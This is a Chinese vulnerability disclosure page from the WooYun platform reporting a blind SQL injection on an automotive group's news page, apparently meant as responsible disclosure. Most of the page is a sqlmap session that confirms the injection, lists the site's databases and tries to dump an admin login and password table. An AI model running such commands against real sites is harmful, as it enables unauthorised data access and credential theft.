当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0142180

漏洞标题:锦龙汽车集团SQL注入漏洞

相关厂商:cncert国家互联网应急中心

漏洞作者: 路人甲

提交时间:2015-09-24 23:59

修复时间:2015-11-09 17:46

公开时间:2015-11-09 17:46

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-09-24: 细节已通知厂商并且等待厂商处理中
2015-09-25: cncert国家互联网应急中心暂未能联系到相关单位,细节仅向通报机构公开
2015-10-05: 细节向核心白帽子及相关领域专家公开
2015-10-15: 细节向普通白帽子公开
2015-10-25: 细节向实习白帽子公开
2015-11-09: 细节向公众公开

简要描述:

锦龙汽车集团网站存在SQL注入漏洞

详细说明:

http://**.**.**.**/sc/media_news_detail.php?id=5480
参数id存在注入。盲注,真心蛋疼
另外,网站不注重安全的?网站还是和其他乱七八糟的共用服务器。

漏洞证明:

D:\tool\sqlmap>sqlmap.py -u http://**.**.**.**/sc/media_news_detail.php?id=5480
_
___ ___| |_____ ___ ___ {1.0-dev-nongit-20150821}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://**.**.**.**
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user'
s responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 09:04:36
[09:04:37] [INFO] testing connection to the target URL
[09:04:40] [INFO] testing if the target URL is stable
[09:04:50] [INFO] target URL is stable
[09:04:50] [INFO] testing if GET parameter 'id' is dynamic
[09:04:55] [INFO] confirming that GET parameter 'id' is dynamic
[09:04:55] [WARNING] GET parameter 'id' does not appear dynamic
[09:04:56] [WARNING] heuristic (basic) test shows that GET parameter 'id' might not be injectable
[09:04:56] [INFO] testing for SQL injection on GET parameter 'id'
[09:04:57] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[09:05:24] [INFO] GET parameter 'id' seems to be 'AND boolean-based blind - WHERE or HAVING clause' injectable
[09:05:24] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[09:05:31] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[09:05:31] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[09:05:33] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[09:05:33] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[09:05:34] [INFO] testing 'MySQL inline queries'
[09:05:35] [INFO] testing 'PostgreSQL inline queries'
[09:05:39] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[09:05:48] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[09:05:48] [WARNING] time-based comparison requires larger statistical model, please wait............
[09:06:02] [CRITICAL] considerable lagging has been detected in connection response(s). Please use as high value for opt
ion '--time-sec' as possible (e.g. 10 or more)
[09:06:05] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[09:06:06] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[09:06:11] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[09:06:12] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[09:06:13] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[09:06:16] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[09:06:22] [INFO] testing 'Oracle AND time-based blind'
[09:06:25] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[09:06:25] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to
explicitly set it using option '--dbms'
[09:06:25] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one othe
r (potential) technique found
[09:08:19] [INFO] target URL appears to be UNION injectable with 15 columns
[09:08:19] [WARNING] applying generic concatenation with double pipes ('||')
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y
/n]
[09:17:13] [WARNING] if UNION based SQL injection is not detected, please consider forcing the back-end DBMS (e.g. '--db
ms=mysql')
[09:17:13] [INFO] testing 'MySQL UNION query (16) - 1 to 20 columns'
[09:17:56] [INFO] checking if the injection point on GET parameter 'id' is a false positive
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 142 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=5480 AND 4372=4372
---
[09:19:33] [INFO] testing MySQL
[09:19:40] [WARNING] the back-end DBMS is not MySQL
[09:19:40] [INFO] testing Oracle
[09:19:50] [WARNING] the back-end DBMS is not Oracle
[09:19:50] [INFO] testing PostgreSQL
[09:19:50] [WARNING] the back-end DBMS is not PostgreSQL
[09:19:50] [INFO] testing Microsoft SQL Server
[09:19:51] [INFO] confirming Microsoft SQL Server
[09:20:13] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[09:20:23] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.2.17
back-end DBMS: Microsoft SQL Server 2000
[09:20:23] [INFO] fetched data logged to text files under 'C:\Users\Administrator\.sqlmap\output\**.**.**.**'
[*] shutting down at 09:20:23
D:\tool\sqlmap>sqlmap.py -u http://**.**.**.**/sc/media_news_detail.php?id=5480 --dbs
_
___ ___| |_____ ___ ___ {1.0-dev-nongit-20150821}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://**.**.**.**
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user'
s responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 09:21:40
[09:21:40] [INFO] resuming back-end DBMS 'microsoft sql server'
[09:21:40] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=5480 AND 4372=4372
---
[09:21:42] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.2.17
back-end DBMS: Microsoft SQL Server 2000
[09:21:42] [INFO] fetching database names
[09:21:42] [INFO] fetching number of databases
[09:21:42] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrie
val
[09:21:42] [INFO] retrieved: 9
[09:21:54] [INFO] retrieved: kamlung_ne
[09:25:48] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
t
[09:26:12] [INFO] retrieved: master
[09:28:28] [INFO] retrieved: model
[09:29:37] [INFO] retrieved: msdb
[09:31:20] [INFO] retrieved: Northwind
[09:35:26] [INFO] retrieved: pubs
[09:37:57] [INFO] retrieved: seasawcn
[09:40:42] [INFO] retrieved: tempdb
[09:43:34] [INFO] retrieved: ww
[09:44:35] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
w_kamlung_com
available databases [9]:
[*] kamlung_net
[*] master
[*] model
[*] msdb
[*] Northwind
[*] pubs
[*] seasawcn
[*] tempdb
[*] www_kamlung_com
[09:51:11] [INFO] fetched data logged to text files under 'C:\Users\Administrator\.sqlmap\output\**.**.**.**'
[*] shutting down at 09:51:11
D:\tool\sqlmap>sqlmap.py -u http://**.**.**.**/sc/media_news_detail.php?id=5480 --current-db
_
___ ___| |_____ ___ ___ {1.0-dev-nongit-20150821}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://**.**.**.**
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user'
s responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 09:55:23
[09:55:24] [INFO] resuming back-end DBMS 'microsoft sql server'
[09:55:24] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=5480 AND 4372=4372
---
[09:55:53] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.2.17
back-end DBMS: Microsoft SQL Server 2000
[09:55:53] [INFO] fetching current database
[09:55:53] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrie
val
[09:55:53] [INFO] retrieved: kamlung_n
[10:01:40] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
e
[10:03:09] [ERROR] user aborted
[*] shutting down at 10:03:09
D:\tool\sqlmap>sqlmap.py -u http://**.**.**.**/sc/media_news_detail.php?id=5480 -D kamlung_net --tables
_
___ ___| |_____ ___ ___ {1.0-dev-nongit-20150821}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://**.**.**.**
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user'
s responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 10:05:43
[10:05:43] [INFO] resuming back-end DBMS 'microsoft sql server'
[10:05:44] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=5480 AND 4372=4372
---
[10:06:00] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.2.17
back-end DBMS: Microsoft SQL Server 2000
[10:06:00] [INFO] fetching tables for database: kamlung_net
[10:06:00] [INFO] fetching number of tables for database 'kamlung_net'
[10:06:00] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrie
val
[10:06:00] [INFO] retrieved: 20
[10:06:33] [INFO] retrieved:
[10:07:58] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
db
[10:10:01] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
o.admin
[10:14:31] [INFO] retrieved: dbo.b
[10:16:14] [ERROR] user aborted
[*] shutting down at 10:16:14
D:\tool\sqlmap>sqlmap.py -u http://**.**.**.**/sc/media_news_detail.php?id=5480 -D kamlung_net -T db.admin --dump
_
___ ___| |_____ ___ ___ {1.0-dev-nongit-20150821}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://**.**.**.**
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user'
s responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 10:16:30
[10:16:30] [INFO] resuming back-end DBMS 'microsoft sql server'
[10:16:30] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=5480 AND 4372=4372
---
[10:16:38] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.2.17
back-end DBMS: Microsoft SQL Server 2000
[10:16:38] [INFO] fetching columns for table 'db.admin' in database 'kamlung_net'
[10:16:38] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrie
val
[10:16:38] [INFO] retrieved: 3
[10:17:06] [INFO] retrieved: id
[10:19:00] [INFO] retrieved: login
[10:22:40] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
[10:23:03] [INFO] retrieved: password
[10:27:41] [INFO] fetching entries for table 'db.admin' in database 'kamlung_net'
[10:27:41] [INFO] fetching number of entries for table 'db.admin' in database 'kamlung_net'
[10:27:41] [INFO] retrieved:
[10:27:47] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch
'--hex'
[10:27:47] [WARNING] unable to retrieve the number of entries for table 'db.admin' in database 'kamlung_net'
[10:27:47] [INFO] fetched data logged to text files under 'C:\Users\Administrator\.sqlmap\output\**.**.**.**'
[*] shutting down at 10:27:47

修复方案:

过滤

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2015-09-25 17:44

厂商回复:

暂未建立与网站管理单位的直接处置渠道,待认领.

最新状态:

暂无